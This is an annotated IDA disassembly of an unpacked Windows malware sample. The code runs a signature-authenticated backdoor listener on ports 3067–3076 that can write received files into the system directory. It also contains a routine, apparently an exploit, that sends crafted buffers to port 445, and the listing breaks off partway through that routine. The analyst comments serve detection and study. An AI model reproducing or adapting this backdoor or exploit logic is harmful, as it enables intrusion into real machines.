; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : A5FC06A2514F68D5027E68847658AF38 ; File Name : u:\work\a5fc06a2514f68d5027e68847658af38_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 400000 ; Section 1. (virtual address 00001000) ; Virtual size : 00004000 ( 16384.) ; Section size in file : 00004000 ( 16384.) ; Offset to raw data for section: 00001000 ; Flags E0000080: Bss Executable Readable Writable ; Alignment : default unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX0 segment para public 'CODE' use32 assume cs:UPX0 ;org 401000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_401000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_401004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_401008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_40100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_403370+1Fr dword_401010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_401014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_403370+5Ar ... 
dword_401018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_40101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_401020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_401024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_401028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_4011F0+10Ar dword_40102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_401030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_401034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_401038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h dword_401040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_401044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_401048 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_40104C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_401050 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_401054 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_401058 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_40105C dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_403460+Cr dword_401060 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_401064 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_403540+Fr dword_401068 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_40106C dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_401070 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_4031F0+30r dword_401074 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_402590+7Br ... dword_401078 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_4022A0+1Fr ... dword_40107C dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_4011F0:loc_4012D7r ... dword_401080 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_401084 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_402510+8r dword_401088 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_4015E0+76r ... 
dword_40108C dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_402790+10Br dword_401090 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_402790+8Dr ... dword_401094 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_4016E0+56r ... dword_401098 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_401340+186r dword_40109C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_401340+17Br ... dword_4010A0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; UPX0:00402CE3r ... dword_4010A4 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_4010A8 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_4010AC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_402B00+15r dword_4010B0 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_4010B4 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_4016E0+292r ... dword_4010B8 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401E10+AAr ... dword_4010BC dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_4028D0+ECr ... dword_4010C0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; UPX0:00402EC3r ... dword_4010C4 dd 7C830D74h ; resolved to->KERNEL32.lstrcmpAdword_4010C8 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA align 10h dword_4010D0 dd 77C227FAh ; resolved to->MSVCRT.__CxxFrameHandlerdword_4010D4 dd 77C47C60h ; resolved to->MSVCRT.strstrdword_4010D8 dd 77C47660h ; resolved to->MSVCRT.strchrdword_4010DC dd 77C371BCh ; resolved to->MSVCRT.sranddword_4010E0 dd 77C371D3h ; resolved to->MSVCRT.rand align 8 dword_4010E8 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_401E10+93r ... 
align 10h dword_4010F0 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_4010F4 dd 42C2ABF4h ; resolved to->WININET.InternetReadFiledword_4010F8 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_4010FC dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState dd 0 dword_401104 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_401108 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_40110C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_401110 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_401114 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_401118 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_402C20+26r dword_40111C dd 71AB2DC0h ; resolved to->WS2_32.selectdword_401120 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoadword_401124 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_401E10+48r dword_401128 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_4016E0+2Dr ... dword_40112C dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4016E0+162r ... dword_401130 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_402CF0+A7r ... dword_401134 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_402CF0+101r ... dword_401138 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_402CF0+107r ... dword_40113C dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_4016E0+581r ... dword_401140 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_4016E0+588r ... dword_401144 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_401340+F1r ... dword_401148 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_401340+B4r ... 
; ---------------------------------------------------------------------------
; Analyst notes for this excerpt (IDA listing of an unpacked 32-bit PE).
; The listing was collapsed onto long lines; it is restored here one statement
; per line. No instruction, operand or label has been changed.
;
; Conventions visible in the code:
;   * API calls go through the resolved import slots (call dword_4010xx); the
;     trailing IDA comment names the API.
;   * Several routines take an object pointer in ecx and pop their own stack
;     arguments (retn N).
;   * sub_403640(size) and sub_403660(ptr) are not part of this excerpt. They
;     are used here like an allocate/free pair (cdecl, one argument) - confirm.
;   * IDA's stack-variable names are unreliable in places: its displayed stack
;     delta drifts in sub_401340 and sub_401E10, and sub_4016E0 is flagged
;     "sp-analysis failed". Where a name is misleading this is noted inline.
; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_401150 - initialise a small object.
; In:  ecx = object
; Out: eax = object
; Writes 0 to [obj+0] and copies the string "cont" to obj+4 with lstrcpyA.
sub_401150 proc near ; CODE XREF: sub_401520+32p
        push esi
        mov esi, ecx
        push offset aCont ; "cont"
        lea eax, [esi+4]
        mov dword ptr [esi], 0
        push eax
        call dword_401074 ; lstrcpyA
        mov eax, esi
        pop esi
        retn
sub_401150 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_401170 - acquire a CryptoAPI provider and import an embedded key.
; In:  ecx = object; provider handle is stored at obj+10h, key handle at obj+14h
; Out: eax = 0 on success, 1 if no provider context could be acquired,
;            2 if CryptImportKey failed
; The key blob is the 114h (276) bytes at dword_404000. That size matches a
; 2048-bit RSA PUBLICKEYBLOB - confirm by inspecting the blob header.
sub_401170 proc near ; CODE XREF: sub_401520+3Bp
        push ebx
        mov ebx, dword_401034
        push esi
        push edi
        mov edi, ecx
        push 0 ; dwFlags = 0
        push 1 ; dwProvType = 1 (PROV_RSA_FULL)
        push 0
        lea esi, [edi+10h] ; esi = &obj->hProv
        push 0
        push esi
        call ebx ; CryptAcquireContextA
        test eax, eax
        jnz short loc_4011A3
        ; first attempt failed: retry with dwFlags = 8 (CRYPT_NEWKEYSET)
        push 8
        push 1
        push eax
        push eax
        push esi
        call ebx ; CryptAcquireContextA
        test eax, eax
        jnz short loc_4011A3
        pop edi
        pop esi
        mov eax, 1
        pop ebx
        retn
; ---------------------------------------------------------------------------

loc_4011A3: ; CODE XREF: sub_401170+1Bj
            ; sub_401170+28j
        mov eax, [esi]
        add edi, 14h ; edi = &obj->hKey
        push edi
        push 0
        push 0
        push 114h
        push offset dword_404000
        push eax
        call dword_401038 ; CryptImportKey
        ; neg/sbb/and/add maps a nonzero (success) result to 0 and zero to 2
        neg eax
        sbb eax, eax
        pop edi
        and al, 0FEh
        pop esi
        add eax, 2
        pop ebx
        retn
sub_401170 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_4011D0 - release the handles set up by sub_401170.
; In:  ecx = object
; Out: eax = 0
; API return values are ignored.
sub_4011D0 proc near ; CODE XREF: sub_401520+8Ep
        push esi
        mov esi, ecx
        mov eax, [esi+14h]
        push eax
        call dword_40102C ; CryptDestroyKey
        mov ecx, [esi+10h]
        push 0
        push ecx
        call dword_401030 ; CryptReleaseContext
        xor eax, eax
        pop esi
        retn
sub_4011D0 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_4011F0 - authenticate the remote peer of an accepted connection.
; In:  ecx   = crypto object (hProv at +10h, imported key at +14h)
;      arg_0 = pointer whose first dword is the connected socket
; Out: eax = 0 if the peer was accepted, 2 otherwise (retn 4)
;
; What the code does:
;   1. Takes the local system time as a FILETIME.
;   2. Receives up to 4000h bytes into a freshly allocated buffer. The recv
;      return value is not checked.
;   3. Treats buf+8 as a 64-bit FILETIME and requires it to be within
;      +/- 8_61C46800h 100-ns units of local time (36,000,000,000 = 1 hour).
;   4. Hashes those 8 bytes with algorithm 8003h (CALG_MD5) and verifies the
;      signature at buf+14h (length at buf+10h, capped at 2800h) against the
;      imported key.
;   5. On success writes rand() to buf+0 and sends those 4 bytes back.
; Only the 8-byte timestamp is covered by the signature.
sub_4011F0 proc near ; CODE XREF: sub_401520+49p

var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 4

        sub esp, 1Ch
        lea eax, [esp+1Ch+var_10]
        push ebx
        push ebp
        push esi
        push edi
        mov ebx, ecx ; ebx = crypto object
        push eax
        call dword_401084 ; GetSystemTime
        lea ecx, [esp+2Ch+var_18] ; var_18/var_14 receive the FILETIME
        lea edx, [esp+2Ch+var_10]
        push ecx
        push edx
        call dword_401080 ; SystemTimeToFileTime
        push 4000h
        call sub_403640
        mov ebp, [esp+30h+arg_0]
        add esp, 4
        mov esi, eax ; esi = receive buffer
        mov eax, [ebp+0] ; socket
        push 0
        push 4000h
        push esi
        push eax
        call dword_401144 ; recv
        ; 64-bit subtraction: eax:ecx = timestamp in message - local time
        mov ecx, [esi+8]
        mov eax, [esp+2Ch+var_18]
        mov edx, [esp+2Ch+var_14]
        lea edi, [esi+8] ; edi = &message timestamp
        sub ecx, eax
        mov eax, [edi+4]
        sbb eax, edx
        ; upper bound of the window: difference must be <= 8:61C46800h
        cmp eax, 8
        jg loc_4012D7
        jl short loc_401261
        cmp ecx, 61C46800h
        ja short loc_4012D7

loc_401261: ; CODE XREF: sub_4011F0+67j
        ; lower bound of the window: difference must be >= FFFFFFF7:9E3B9800h
        cmp eax, 0FFFFFFF7h
        jl short loc_4012D7
        jg short loc_401270
        cmp ecx, 9E3B9800h
        jb short loc_4012D7

loc_401270: ; CODE XREF: sub_4011F0+76j
        mov edx, [ebx+10h]
        lea ecx, [esp+2Ch+var_1C] ; var_1C receives the hash handle
        push ecx
        push 0
        push 0
        push 8003h ; CALG_MD5
        push edx
        call dword_40101C ; CryptCreateHash
        test eax, eax
        jz short loc_4012C6
        mov eax, [esp+2Ch+var_1C]
        push 0
        push 8 ; hash exactly the 8 timestamp bytes
        push edi
        push eax
        call dword_401020 ; CryptHashData
        test eax, eax
        jz short loc_4012C6
        mov eax, [esi+10h] ; signature length supplied by the peer
        cmp eax, 2800h
        ja short loc_4012C6
        mov ecx, [ebx+14h]
        push 0
        push 0
        push ecx
        push eax
        mov eax, [esp+3Ch+var_1C]
        lea edx, [esi+14h] ; signature bytes
        push edx
        push eax
        call dword_401024 ; CryptVerifySignatureA
        test eax, eax
        jnz short loc_4012F5

loc_4012C6: ; CODE XREF: sub_4011F0+9Aj
            ; sub_4011F0+AEj ...
        call dword_40107C ; RtlGetLastWin32Error
        mov ecx, [esp+2Ch+var_1C]
        push ecx
        call dword_401028 ; CryptDestroyHash

loc_4012D7: ; CODE XREF: sub_4011F0+61j
            ; sub_4011F0+6Fj ...
        ; rejection path: the error code is fetched but not used
        call dword_40107C ; RtlGetLastWin32Error
        push esi
        call sub_403660
        add esp, 4
        mov eax, 2
        pop edi
        pop esi
        pop ebp
        pop ebx
        add esp, 1Ch
        retn 4
; ---------------------------------------------------------------------------

loc_4012F5: ; CODE XREF: sub_4011F0+D4j
        ; acceptance path: reply with a 4-byte rand() value
        mov edx, [esp+2Ch+var_1C]
        push edx
        call dword_401028 ; CryptDestroyHash
        call dword_401078 ; GetTickCount
        push eax
        call sub_403686 ; srand
        add esp, 4
        call sub_403680 ; rand
        mov [esi], eax
        mov eax, [ebp+0]
        push 0
        push 4
        push esi
        push eax
        call dword_401148 ; send
        push esi
        call sub_403660
        add esp, 4
        xor eax, eax
        pop edi
        pop esi
        pop ebp
        pop ebx
        add esp, 1Ch
        retn 4
sub_4011F0 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_401340 - handle one command received on an authenticated connection.
; In (cdecl, caller cleans 0Ch):
;      arg_0 = socket
;      arg_4 = receive buffer
;      arg_8 = number of bytes received
; Message layout as read by this routine: dword command at buf+0, a status /
; count dword at buf+4, payload from buf+8.
;
;   fewer than 8 bytes : the bytes are sent straight back
;   command 0          : receive a file. CWD is set to the system directory,
;                        buf+8 = total size, buf+0Ch = chunk size,
;                        buf+10h = file name (copied with a 104h limit). The
;                        file is created with CREATE_ALWAYS / GENERIC_WRITE and
;                        filled chunk by chunk; after each chunk an 8-byte
;                        acknowledgement is sent with the byte count at buf+4.
;   command 1          : set CWD to the system directory, send 4 bytes back
;   command 3          : call sub_402B70(buf+0Ch, [buf+8]) (not in this
;                        excerpt), then send 4 bytes back
;   anything else      : ignored
;
; NOTE(review): in command 0 the chunk size comes from the peer and is used
; both as a divisor (zero is not rejected) and as the recv length into buf+8;
; the caller's buffer is 10000h bytes. No bound check is visible here.
;
; NOTE(review): between the "push ebp" below and the return after loc_401472
; the real stack depth is 234h (the epilogue pops ebp, edi, esi, ebx and then
; adds 224h), but IDA displays 230h. Each [esp+230h+var_N] operand in that
; stretch therefore addresses the slot 4 bytes below the one IDA names. The
; inline comments give the role of each slot.
sub_401340 proc near ; CODE XREF: sub_401520+77p

var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_108 = byte ptr -108h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch

        mov eax, [esp+arg_8]
        sub esp, 224h
        cmp eax, 8
        push ebx
        push esi
        push edi
        jge short loc_401362
        ; short message: send(sock, buf, len, 0) via the shared tail
        push 0
        push eax
        mov eax, [esp+238h+arg_4]
        push eax
        jmp loc_401502
; ---------------------------------------------------------------------------

loc_401362: ; CODE XREF: sub_401340+10j
        mov edi, [esp+230h+arg_4] ; edi = message
        mov eax, [edi] ; eax = command
        lea ebx, [edi+8] ; ebx = payload
        test eax, eax
        jnz loc_4014AC
        ; ---- command 0: receive a file into the system directory ----
        lea edx, [esp+230h+var_108]
        push 104h
        push edx
        call dword_40109C ; GetSystemDirectoryA
        lea eax, [esp+230h+var_108]
        push eax
        call dword_401098 ; SetCurrentDirectoryA
        mov ecx, [ebx] ; total size
        mov esi, [ebx+4] ; chunk size
        lea edx, [ebx+8] ; file name
        push 104h
        lea eax, [esp+234h+var_210]
        push edx
        push eax
        mov [esp+23Ch+var_224], ecx ; save total size
        mov [esp+23Ch+var_218], esi ; save chunk size
        call dword_401094 ; lstrcpynA
        push 0
        push 0
        push 2 ; CREATE_ALWAYS
        push 0
        push 0
        lea ecx, [esp+244h+var_210]
        push 40000000h ; GENERIC_WRITE
        push ecx
        call dword_401090 ; CreateFileA
        cmp eax, 0FFFFFFFFh
        mov [esp+230h+var_21C], eax ; save file handle
        jz loc_401488
        push ebp
        mov ebp, [esp+234h+arg_0] ; ebp = socket
        push 0
        push 8
        push edi
        push ebp
        mov dword ptr [edi+4], 1 ; status 1 = file opened
        call dword_401148 ; send
        ; chunk count = ceil(total size / chunk size)
        mov ecx, [esp+230h+var_220] ; real slot: saved total size
        xor edx, edx
        mov eax, ecx
        div esi
        xor edx, edx
        mov [esp+230h+var_21C], eax ; real slot: chunk count
        mov eax, ecx
        div esi
        test edx, edx
        jz short loc_401416
        inc [esp+230h+var_21C]

loc_401416: ; CODE XREF: sub_401340+D0j
        mov eax, [esp+230h+var_21C] ; chunk count
        mov [esp+230h+var_220], 0 ; real slot: loop index (reuses total-size slot)
        test eax, eax
        jle short loc_401472
        jmp short loc_40142C
; ---------------------------------------------------------------------------

loc_401428: ; CODE XREF: sub_401340+130j
        mov esi, [esp+230h+var_214] ; real slot: saved chunk size

loc_40142C: ; CODE XREF: sub_401340+E6j
        push 0
        push esi
        push ebx
        push ebp
        call dword_401144 ; recv
        mov esi, eax
        cmp esi, 0FFFFFFFFh
        jz short loc_401472
        mov eax, [esp+230h+var_218] ; real slot: file handle
        lea edx, [esp+230h+var_210] ; receives bytes-written count
        push 0
        push edx
        push esi
        push ebx
        push eax
        call dword_40108C ; WriteFile
        push 0
        push 8
        push edi
        push ebp
        mov [edi+4], esi ; acknowledge with the received byte count
        call dword_401148 ; send
        mov eax, [esp+230h+var_220]
        mov ecx, [esp+230h+var_21C]
        inc eax
        cmp eax, ecx
        mov [esp+230h+var_220], eax
        jl short loc_401428

loc_401472: ; CODE XREF: sub_401340+E4j
            ; sub_401340+FCj
        mov ecx, [esp+230h+var_218] ; real slot: file handle
        push ecx
        call dword_401088 ; CloseHandle
        pop ebp
        pop edi
        pop esi
        pop ebx
        add esp, 224h
        retn
; ---------------------------------------------------------------------------

loc_401488: ; CODE XREF: sub_401340+99j
        ; CreateFileA failed: reply with status 0
        mov edx, [esp+230h+arg_0]
        push 0
        push 8
        push edi
        push edx

loc_401495: ; DATA XREF: UPX0:off_404800o
        ; NOTE(review): the data xref from off_404800 into the middle of this
        ; routine may just be a table value that looks like an address - verify
        mov dword ptr [edi+4], 0
        call dword_401148 ; send
        pop edi
        pop esi
        pop ebx
        add esp, 224h
        retn
; ---------------------------------------------------------------------------

loc_4014AC: ; CODE XREF: sub_401340+30j
        cmp eax, 1
        jnz short loc_4014E9
        ; ---- command 1: change to the system directory, echo 4 bytes ----
        lea eax, [esp+230h+var_210]
        push 104h
        push eax
        call dword_40109C ; GetSystemDirectoryA
        lea ecx, [esp+230h+var_210]
        push ecx
        call dword_401098 ; SetCurrentDirectoryA
        mov edx, [esp+230h+arg_0]
        push 0
        push 4
        push edi
        push edx
        call dword_401148 ; send
        pop edi
        pop esi
        pop ebx
        add esp, 224h
        retn
; ---------------------------------------------------------------------------

loc_4014E9: ; CODE XREF: sub_401340+16Fj
        cmp eax, 3
        jnz short loc_401510
        ; ---- command 3: hand the payload to sub_402B70, echo 4 bytes ----
        mov eax, [ebx]
        add ebx, 4
        push eax
        push ebx
        call sub_402B70
        add esp, 8
        push 0
        push 4
        push edi

loc_401502: ; CODE XREF: sub_401340+1Dj
        ; shared tail: flags, length and buffer are already on the stack
        mov ecx, [esp+23Ch+arg_0]
        push ecx
        call dword_401148 ; send

loc_401510: ; CODE XREF: sub_401340+1ACj
        pop edi
        pop esi
        pop ebx
        add esp, 224h
        retn
sub_401340 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_401520 - per-connection worker thread (start address passed to
; CreateThread in sub_4015E0).
; In:  arg_0 = pointer to a 6-dword block: socket, four dwords of peer
;              address, event handle
; The block is copied to the local frame first and the event is then signalled,
; which is what the listener waits for before reusing its own copy.
; Flow: init crypto object -> sub_4011F0 authentication -> loop of
; recv(up to 10000h) / sub_401340 until recv returns 0 or -1 -> cleanup ->
; ExitThread(0).
; The return value of sub_401170 is not checked.
sub_401520 proc near ; DATA XREF: sub_4015E0+CFo

var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 4

        sub esp, 30h
        mov ecx, 6
        push esi
        mov esi, [esp+34h+arg_0]
        push edi
        lea edi, [esp+38h+var_30]
        rep movsd ; copy the 6-dword parameter block
        mov eax, [esp+38h+var_1C] ; event handle
        push eax
        call dword_4010A4 ; SetEvent
        push 10000h
        call sub_403640
        add esp, 4
        lea ecx, [esp+38h+var_18]
        mov esi, eax ; esi = receive buffer
        call sub_401150
        lea ecx, [esp+38h+var_18]
        call sub_401170
        lea ecx, [esp+38h+var_30] ; &socket
        push ecx
        lea ecx, [esp+3Ch+var_18]
        call sub_4011F0
        test eax, eax
        jnz short loc_4015A1 ; not authenticated: drop the connection
        mov edi, dword_401144

loc_401578: ; CODE XREF: sub_401520+7Fj
        mov edx, [esp+38h+var_30]
        push 0
        push 10000h
        push esi
        push edx
        call edi ; recv
        cmp eax, 0FFFFFFFFh
        jz short loc_4015A1
        test eax, eax
        jz short loc_4015A1
        push eax
        mov eax, [esp+3Ch+var_30]
        push esi
        push eax
        call sub_401340
        add esp, 0Ch
        jmp short loc_401578
; ---------------------------------------------------------------------------

loc_4015A1: ; CODE XREF: sub_401520+50j
            ; sub_401520+6Aj ...
        push esi
        call sub_403660
        add esp, 4
        lea ecx, [esp+38h+var_18]
        call sub_4011D0
        mov ecx, [esp+38h+var_30]
        push 2
        push ecx
        call dword_40113C ; shutdown
        mov edx, [esp+38h+var_30]
        push edx
        call dword_401140 ; closesocket
        push 0
        call dword_4010A0 ; ExitThread
        pop edi
        xor eax, eax
        pop esi
        add esp, 30h
        retn 4
sub_401520 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; Attributes: noreturn

; sub_4015E0 - TCP listener for the command channel.
; Creates socket(2, 1, 0) (AF_INET, SOCK_STREAM) and tries to bind it to
; address 0 on ports 0BFBh .. 0BFBh+9 (3067 .. 3076), stopping at the first
; successful bind. If every bind fails the code still falls through to listen.
; It then loops forever: accept -> build the 6-dword parameter block
; (socket, peer address, event) -> CreateThread(sub_401520) -> wait up to
; 3E8h ms for the worker to signal the event -> close the event.
; The accept return value is not checked before it is handed to the worker.
sub_4015E0 proc near ; DATA XREF: UPX0:00402F08o

var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4

        sub esp, 40h
        push ebx
        push ebp
        push esi
        xor esi, esi ; esi = port offset, starts at 0
        push edi
        push esi
        push 1
        push 2
        call dword_401128 ; socket
        mov edi, eax ; edi = listening socket
        xor eax, eax
        mov ebx, dword_40112C
        mov ebp, dword_401130
        ; var_38 .. var_2C form the 16-byte socket address passed to bind
        mov [esp+50h+var_38], eax
        mov word ptr [esp+50h+var_38], 2 ; family = 2
        mov [esp+50h+var_34], eax
        mov [esp+50h+var_34], esi ; address = 0
        mov [esp+50h+var_30], eax
        mov [esp+50h+var_2C], eax

loc_40161F: ; CODE XREF: sub_4015E0+5Fj
        lea ecx, [esi+0BFBh] ; candidate port = 3067 + offset
        push ecx
        call ebx ; ntohs
        lea edx, [esp+50h+var_38]
        push 10h
        push edx
        push edi
        mov word ptr [esp+5Ch+var_38+2], ax ; port in network byte order
        call ebp ; bind
        test eax, eax
        jz short loc_401641
        inc esi
        cmp esi, 0Ah
        jl short loc_40161F

loc_401641: ; CODE XREF: sub_4015E0+59j
        push 32h
        push edi
        call dword_401134 ; listen
        mov ebx, dword_401138
        mov ebp, dword_4010B0
        mov esi, dword_401088

loc_40165C: ; CODE XREF: sub_4015E0+F8j
        lea eax, [esp+50h+var_40]
        lea ecx, [esp+50h+var_28] ; peer address is returned in var_28 .. var_1C
        push eax
        push ecx
        push edi
        mov [esp+5Ch+var_40], 10h
        call ebx ; accept
        ; the two pushes below are the last two CreateEventA arguments; the
        ; parameter block var_18 .. var_8 is filled in between the pushes
        push 0
        push 0
        mov edx, [esp+58h+var_28]
        mov ecx, [esp+58h+var_20]
        mov [esp+58h+var_18], eax ; accepted socket
        mov eax, [esp+58h+var_24]
        mov [esp+58h+var_14], edx
        mov edx, [esp+58h+var_1C]
        push 1
        push 0
        mov [esp+60h+var_10], eax
        mov [esp+60h+var_C], ecx
        mov [esp+60h+var_8], edx
        call ebp ; CreateEventA
        lea ecx, [esp+50h+var_18]
        mov [esp+50h+var_4], eax ; event handle, last dword of the block
        lea eax, [esp+50h+var_3C]
        push eax
        push 0
        push ecx
        push offset sub_401520
        push 0
        push 0
        call dword_4010AC ; CreateThread
        push eax
        call esi ; CloseHandle
        push 3E8h
        mov edx, [esp+54h+var_4]
        push edx
        call dword_4010A8 ; WaitForSingleObject
        mov eax, [esp+50h+var_4]
        push eax
        call esi ; CloseHandle
        jmp short loc_40165C
sub_4015E0 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================

; sub_4016E0 - outbound routine against TCP port 1BDh (445) of one address.
; IDA marks this function "sp-analysis failed": the displayed stack delta
; keeps growing across the API calls, so the var_/arg_ names below do NOT
; identify stable slots and must not be read as real arguments or locals.
; The frame is 8214h bytes, set up through sub_403690 (not in this excerpt;
; presumably a stack-probe helper - confirm). The slot IDA calls arg_8208 is
; the target address passed to inet_ntoa and used for connect.
;
; Observable behaviour, useful for network and host detection:
;   * connect to <address>:445
;   * three fixed blobs are sent in order (89h bytes from dword_4043F4,
;     0A8h bytes from dword_404480, 0DEh bytes from dword_40452C), each
;     followed by Sleep(1F4h) and a recv of up to 640h bytes
;   * the third reply must be at least 46h bytes long; one byte of it is
;     compared with 31h ('1') to choose between two buffer layouts
;   * large stack buffers are filled with 90h and 31h bytes, the string at
;     loc_404120 and several table blocks (dword_404780, off_404800,
;     dword_404894, dword_404900, dword_404974) are copied in, and the result
;     is sent with lengths 0CF8h, or 10FCh followed by 0FDCh
; This has the shape of an exploit attempt against the service on port 445;
; the vulnerability is not identifiable from this excerpt alone.
;
; Return value: 1 if socket() fails; otherwise a status slot that is
; initialised to 1 and cleared at loc_401C4F - TODO confirm, given the
; unreliable stack names.
sub_4016E0 proc near ; CODE XREF: sub_403190+2Bp
                     ; sub_4031F0+79p

var_128 = dword ptr -128h
var_11C = dword ptr -11Ch
var_10C = dword ptr -10Ch
var_A2 = byte ptr -0A2h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_38 = byte ptr -38h
var_1A = byte ptr -1Ah
var_C = byte ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_2C = byte ptr 30h
arg_30 = byte ptr 34h
arg_38 = byte ptr 3Ch
arg_4C = byte ptr 50h
arg_4F = byte ptr 53h
arg_54 = byte ptr 58h
arg_78 = byte ptr 7Ch
arg_79 = byte ptr 7Dh
